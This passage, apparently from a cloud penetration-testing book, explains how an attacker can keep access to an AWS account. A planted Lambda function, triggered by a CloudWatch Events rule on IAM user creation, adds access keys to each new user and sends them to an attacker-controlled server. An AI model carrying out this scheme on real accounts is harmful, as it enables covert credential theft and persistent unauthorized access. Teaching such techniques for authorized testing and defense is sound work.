Starting with the first point in the previous section, we want a Lambda function to trigger on an event that might be worthy of exploiting. We will tie this into our methods of persistence described earlier in this chapter, so for backdooring IAM users, the event that might be worthy of exploiting might be when a new user is created. We could trigger our Lambda function with that event (with CloudWatch Events), which then runs our code that is set up to automatically add a new set of access keys to that user, then exfiltrates those credentials to a server we specified.

This scenario ties together like this:

1. The attacker (us) creates a malicious Lambda function in a target account
2. The attacker creates a trigger to run the Lambda function every time a new IAM user is created
3. The attacker sets up a listener on a server that they control, which will wait for credentials
4. 2 days pass
5. A regular user in the environment creates a new IAM user
6. The attacker's Lambda function is triggered
7. The function adds a set of access keys to the newly created user
8. The function makes an HTTP request to the attacker's server with the credentials that were created

Now the attacker just sits back and waits for credentials to flow in to their server.

It may seem like a complicated process, but in the simplest terms, you can think of it as a persistent method of establishing persistence. We already understand how to establish persistence in the first place, so all Lambda adds to the equation is the ability to do it continuously.

For a function to trigger an event, such as a user being created, a CloudWatch Event rule must be created. A CloudWatch Event rule is a way to basically say—perform this action if I see this happen in the environment. For our CloudWatch Event rule to work correctly, we also need CloudTrail logging enabled in the us-east-1 region. This is because we are triggered by an IAM event (iam:CreateUser), and IAM events are only delivered to us-east-1 CloudWatch Events. In most situations, CloudTrail logging will be enabled. It is best practice to enable it across all AWS regions, and if CloudTrail isn't enabled, then you are likely in a less-polished environment where there are other problems to focus on.